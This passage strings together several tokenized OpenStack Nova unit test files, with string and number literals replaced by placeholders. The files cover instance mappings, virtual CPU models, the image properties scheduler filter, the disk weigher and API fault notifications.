<EOL> uuid_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_instance_uuid_cell_mapping_none ( self , uuid_from_db ) : <EOL> db_mapping = get_db_mapping ( cell_mapping = None , cell_id = None ) <EOL> uuid_from_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( ) . get_by_instance_uuid ( <EOL> self . context , db_mapping [ '<STR_LIT>' ] ) <EOL> uuid_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_create ( self , create_in_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> create_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = objects . CellMapping ( self . context , <EOL> id = db_mapping [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> mapping_obj . project_id = db_mapping [ '<STR_LIT>' ] <EOL> mapping_obj . create ( ) <EOL> create_in_db . assert_called_once_with ( self . context , <EOL> { '<STR_LIT>' : uuid , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] } ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_create_cell_mapping_none ( self , create_in_db ) : <EOL> db_mapping = get_db_mapping ( cell_mapping = None , cell_id = None ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> create_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = None <EOL> mapping_obj . project_id = db_mapping [ '<STR_LIT>' ] <EOL> mapping_obj . create ( ) <EOL> create_in_db . assert_called_once_with ( self . context , <EOL> { '<STR_LIT>' : uuid , <EOL> '<STR_LIT>' : db_mapping [ '<STR_LIT>' ] } ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertIsNone ( mapping_obj . cell_mapping ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_save ( self , save_in_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> uuid = db_mapping [ '<STR_LIT>' ] <EOL> save_in_db . return_value = db_mapping <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . cell_mapping = objects . CellMapping ( self . context , id = <NUM_LIT> ) <EOL> mapping_obj . save ( ) <EOL> save_in_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : mapping_obj . cell_mapping . id , <EOL> '<STR_LIT>' : uuid } ) <EOL> self . compare_obj ( mapping_obj , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMapping , '<STR_LIT>' ) <EOL> def test_destroy ( self , destroy_in_db ) : <EOL> uuid = uuidutils . generate_uuid ( ) <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . instance_uuid = uuid <EOL> mapping_obj . destroy ( ) <EOL> destroy_in_db . assert_called_once_with ( self . context , uuid ) <EOL> def test_cell_mapping_nullable ( self ) : <EOL> mapping_obj = objects . InstanceMapping ( self . context ) <EOL> mapping_obj . cell_mapping = None <EOL> class TestInstanceMappingObject ( test_objects . _LocalTest , <EOL> _TestInstanceMappingObject ) : <EOL> pass <EOL> class TestRemoteInstanceMappingObject ( test_objects . _RemoteTest , <EOL> _TestInstanceMappingObject ) : <EOL> pass <EOL> class _TestInstanceMappingListObject ( object ) : <EOL> def _check_cell_map_value ( self , db_val , cell_obj ) : <EOL> self . assertEqual ( db_val , cell_obj . id ) <EOL> @ mock . patch . object ( instance_mapping . InstanceMappingList , <EOL> '<STR_LIT>' ) <EOL> def test_get_by_project_id ( self , project_id_from_db ) : <EOL> db_mapping = get_db_mapping ( ) <EOL> project_id_from_db . return_value = [ db_mapping ] <EOL> mapping_obj = objects . InstanceMappingList ( ) . get_by_project_id ( <EOL> self . context , db_mapping [ '<STR_LIT>' ] ) <EOL> project_id_from_db . assert_called_once_with ( self . context , <EOL> db_mapping [ '<STR_LIT>' ] ) <EOL> self . compare_obj ( mapping_obj . objects [ <NUM_LIT:0> ] , db_mapping , <EOL> subs = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> comparators = { <EOL> '<STR_LIT>' : self . _check_cell_map_value } ) <EOL> class TestInstanceMappingListObject ( test_objects . _LocalTest , <EOL> _TestInstanceMappingListObject ) : <EOL> pass <EOL> class TestRemoteInstanceMappingListObject ( test_objects . _RemoteTest , <EOL> _TestInstanceMappingListObject ) : <EOL> pass </s>
<s> from nova . compute import arch <EOL> from nova . compute import cpumodel <EOL> from nova import objects <EOL> from nova . tests . unit . objects import test_objects <EOL> fake_cpu_model_feature = { <EOL> '<STR_LIT>' : cpumodel . POLICY_REQUIRE , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> } <EOL> fake_cpu_model_feature_obj = objects . VirtCPUFeature ( <EOL> ** fake_cpu_model_feature ) <EOL> fake_vcpumodel_dict = { <EOL> '<STR_LIT>' : arch . I686 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cpumodel . MATCH_EXACT , <EOL> '<STR_LIT>' : objects . VirtCPUTopology ( sockets = <NUM_LIT:1> , cores = <NUM_LIT:1> , threads = <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : [ fake_cpu_model_feature_obj ] , <EOL> '<STR_LIT>' : cpumodel . MODE_HOST_MODEL , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> fake_vcpumodel = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> class _TestVirtCPUFeatureObj ( object ) : <EOL> def test_policy_limitation ( self ) : <EOL> obj = objects . VirtCPUFeature ( ) <EOL> self . assertRaises ( ValueError , setattr , obj , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> class TestVirtCPUFeatureObj ( test_objects . _LocalTest , <EOL> _TestVirtCPUFeatureObj ) : <EOL> pass <EOL> class TestRemoteVirtCPUFeatureObj ( test_objects . _LocalTest , <EOL> _TestVirtCPUFeatureObj ) : <EOL> pass <EOL> class _TestVirtCPUModel ( object ) : <EOL> def test_create ( self ) : <EOL> model = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> self . assertEqual ( fake_vcpumodel_dict [ '<STR_LIT>' ] , model . model ) <EOL> self . assertEqual ( fake_vcpumodel_dict [ '<STR_LIT>' ] . sockets , <EOL> model . topology . sockets ) <EOL> feature = model . features [ <NUM_LIT:0> ] <EOL> self . assertEqual ( fake_cpu_model_feature [ '<STR_LIT>' ] , <EOL> feature . policy ) <EOL> def test_defaults ( self ) : <EOL> model = objects . VirtCPUModel ( ) <EOL> self . assertIsNone ( model . mode ) <EOL> self . assertIsNone ( model . model ) <EOL> self . assertIsNone ( model . vendor ) <EOL> self . assertIsNone ( model . arch ) <EOL> self . assertIsNone ( model . match ) <EOL> self . assertEqual ( [ ] , model . features ) <EOL> self . assertIsNone ( model . topology ) <EOL> def test_arch_field ( self ) : <EOL> model = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> self . assertRaises ( ValueError , setattr , model , '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> def test_serialize ( self ) : <EOL> modelin = objects . VirtCPUModel ( ** fake_vcpumodel_dict ) <EOL> modelout = objects . VirtCPUModel . from_json ( modelin . to_json ( ) ) <EOL> self . assertEqual ( modelin . mode , modelout . mode ) <EOL> self . assertEqual ( modelin . model , modelout . model ) <EOL> self . assertEqual ( modelin . vendor , modelout . vendor ) <EOL> self . assertEqual ( modelin . arch , modelout . arch ) <EOL> self . assertEqual ( modelin . match , modelout . match ) <EOL> self . assertEqual ( modelin . features [ <NUM_LIT:0> ] . policy , <EOL> modelout . features [ <NUM_LIT:0> ] . policy ) <EOL> self . assertEqual ( modelin . features [ <NUM_LIT:0> ] . name , modelout . features [ <NUM_LIT:0> ] . name ) <EOL> self . assertEqual ( modelin . topology . sockets , modelout . topology . sockets ) <EOL> self . assertEqual ( modelin . topology . cores , modelout . topology . cores ) <EOL> self . assertEqual ( modelin . topology . threads , modelout . topology . threads ) <EOL> class TestVirtCPUModel ( test_objects . _LocalTest , <EOL> _TestVirtCPUModel ) : <EOL> pass <EOL> class TestRemoteVirtCPUModel ( test_objects . _LocalTest , <EOL> _TestVirtCPUModel ) : <EOL> pass </s>
<s> from oslo_utils import versionutils <EOL> from nova . compute import arch <EOL> from nova . compute import hv_type <EOL> from nova . compute import vm_mode <EOL> from nova import objects <EOL> from nova . scheduler . filters import image_props_filter <EOL> from nova import test <EOL> from nova . tests . unit . scheduler import fakes <EOL> class TestImagePropsFilter ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestImagePropsFilter , self ) . setUp ( ) <EOL> self . filt_cls = image_props_filter . ImagePropertiesFilter ( ) <EOL> def test_image_properties_filter_passes_same_inst_props_and_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_different_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . ARMV7 , <EOL> img_hv_type = hv_type . QEMU , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_different_hyper_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_partial_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_partial_inst_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . XEN , vm_mode . XEN ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_without_inst_props ( self ) : <EOL> spec_obj = objects . RequestSpec ( image = None ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_without_host_props ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_passes_without_hyper_version ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_fails_with_unsupported_hyper_ver ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = arch . X86_64 , <EOL> img_hv_type = hv_type . KVM , <EOL> hw_vm_mode = vm_mode . HVM , <EOL> img_hv_requested_version = '<STR_LIT>' ) ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertFalse ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_pv_mode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . XEN , vm_mode . XEN ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_hvm_mode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . X86_64 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_xen_arch_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_architecture = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . KVM , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_xen_hv_type_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> img_hv_type = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . XEN , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) <EOL> def test_image_properties_filter_baremetal_vmmode_compat ( self ) : <EOL> img_props = objects . ImageMeta ( <EOL> properties = objects . ImageMetaProps ( <EOL> hw_vm_mode = '<STR_LIT>' ) ) <EOL> hypervisor_version = versionutils . convert_version_to_int ( '<STR_LIT>' ) <EOL> spec_obj = objects . RequestSpec ( image = img_props ) <EOL> capabilities = { '<STR_LIT>' : <EOL> [ ( arch . I686 , hv_type . BAREMETAL , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : hypervisor_version } <EOL> host = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , capabilities ) <EOL> self . assertTrue ( self . filt_cls . host_passes ( host , spec_obj ) ) </s>
<s> """<STR_LIT>""" <EOL> from nova . scheduler import weights <EOL> from nova . scheduler . weights import disk <EOL> from nova import test <EOL> from nova . tests . unit . scheduler import fakes <EOL> class DiskWeigherTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( DiskWeigherTestCase , self ) . setUp ( ) <EOL> self . weight_handler = weights . HostWeightHandler ( ) <EOL> self . weighers = [ disk . DiskWeigher ( ) ] <EOL> def _get_weighed_host ( self , hosts , weight_properties = None ) : <EOL> if weight_properties is None : <EOL> weight_properties = { } <EOL> return self . weight_handler . get_weighed_objects ( self . weighers , <EOL> hosts , weight_properties ) [ <NUM_LIT:0> ] <EOL> def _get_all_hosts ( self ) : <EOL> host_values = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> ] <EOL> return [ fakes . FakeHostState ( host , node , values ) <EOL> for host , node , values in host_values ] <EOL> def test_default_of_spreading_first ( self ) : <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . assertEqual ( <NUM_LIT:1.0> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> def test_disk_filter_multiplier1 ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT:0.0> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , weighed_host . weight ) <EOL> def test_disk_filter_multiplier2 ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> weighed_host = self . _get_weighed_host ( hostinfo_list ) <EOL> self . assertEqual ( <NUM_LIT:1.0> * <NUM_LIT:2> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> def test_disk_filter_negative ( self ) : <EOL> self . flags ( disk_weight_multiplier = <NUM_LIT:1.0> ) <EOL> hostinfo_list = self . _get_all_hosts ( ) <EOL> host_attr = { '<STR_LIT:id>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : - <NUM_LIT> } <EOL> host_state = fakes . FakeHostState ( '<STR_LIT>' , '<STR_LIT>' , host_attr ) <EOL> hostinfo_list = list ( hostinfo_list ) + [ host_state ] <EOL> weights = self . weight_handler . get_weighed_objects ( self . weighers , <EOL> hostinfo_list , { } ) <EOL> weighed_host = weights [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <NUM_LIT:1> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) <EOL> weighed_host = weights [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( <NUM_LIT:0> , weighed_host . weight ) <EOL> self . assertEqual ( '<STR_LIT>' , weighed_host . obj . host ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import mock <EOL> from oslo_context import context as o_context <EOL> from oslo_context import fixture as o_fixture <EOL> from nova . compute import flavors <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> from nova import context <EOL> from nova import exception <EOL> from nova import notifications <EOL> from nova import objects <EOL> from nova . objects import base as obj_base <EOL> from nova import test <EOL> from nova . tests . unit import fake_network <EOL> from nova . tests . unit import fake_notifier <EOL> class NotificationsTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NotificationsTestCase , self ) . setUp ( ) <EOL> self . fixture = self . useFixture ( o_fixture . ClearRequestContext ( ) ) <EOL> self . net_info = fake_network . fake_get_instance_nw_info ( self , <NUM_LIT:1> , <EOL> <NUM_LIT:1> ) <EOL> def fake_get_nw_info ( cls , ctxt , instance ) : <EOL> self . assertTrue ( ctxt . is_admin ) <EOL> return self . net_info <EOL> self . stub_out ( '<STR_LIT>' , <EOL> fake_get_nw_info ) <EOL> fake_network . set_stub_network_methods ( self ) <EOL> fake_notifier . stub_notifier ( self . stubs ) <EOL> self . addCleanup ( fake_notifier . reset ) <EOL> self . flags ( compute_driver = '<STR_LIT>' , <EOL> network_manager = '<STR_LIT>' , <EOL> notify_on_state_change = "<STR_LIT>" , <EOL> host = '<STR_LIT>' ) <EOL> self . flags ( api_servers = [ '<STR_LIT>' ] , group = '<STR_LIT>' ) <EOL> self . user_id = '<STR_LIT>' <EOL> self . project_id = '<STR_LIT>' <EOL> self . context = context . RequestContext ( self . user_id , self . project_id ) <EOL> self . instance = self . _wrapped_create ( ) <EOL> self . decorated_function_called = False <EOL> def _wrapped_create ( self , params = None ) : <EOL> instance_type = flavors . get_flavor_by_name ( '<STR_LIT>' ) <EOL> inst = objects . Instance ( image_ref = <NUM_LIT:1> , <EOL> user_id = self . user_id , <EOL> project_id = self . project_id , <EOL> instance_type_id = instance_type [ '<STR_LIT:id>' ] , <EOL> root_gb = <NUM_LIT:0> , <EOL> ephemeral_gb = <NUM_LIT:0> , <EOL> access_ip_v4 = '<STR_LIT>' , <EOL> access_ip_v6 = '<STR_LIT>' , <EOL> display_name = '<STR_LIT>' , <EOL> hostname = '<STR_LIT>' , <EOL> node = '<STR_LIT>' , <EOL> system_metadata = { } ) <EOL> inst . _context = self . context <EOL> if params : <EOL> inst . update ( params ) <EOL> inst . flavor = instance_type <EOL> inst . create ( ) <EOL> return inst <EOL> def test_send_api_fault_disabled ( self ) : <EOL> self . flags ( notify_api_faults = False ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , None ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_api_fault ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> def test_send_api_fault_fresh_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> ctxt = context . RequestContext ( overwrite = True ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( ctxt , n . context ) <EOL> def test_send_api_fault_fake_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> ctxt = o_context . get_current ( ) <EOL> self . assertIsNotNone ( ctxt ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertIsNotNone ( n . context ) <EOL> self . assertEqual ( ctxt , n . context ) <EOL> def test_send_api_fault_admin_context ( self ) : <EOL> self . flags ( notify_api_faults = True ) <EOL> exception = None <EOL> try : <EOL> raise test . TestingException ( "<STR_LIT>" ) <EOL> except test . TestingException as e : <EOL> exception = e <EOL> self . fixture . _remove_cached_context ( ) <EOL> self . assertIsNone ( o_context . get_current ( ) ) <EOL> notifications . send_api_fault ( "<STR_LIT>" , <NUM_LIT> , exception ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , '<STR_LIT>' ) <EOL> self . assertEqual ( n . payload [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> self . 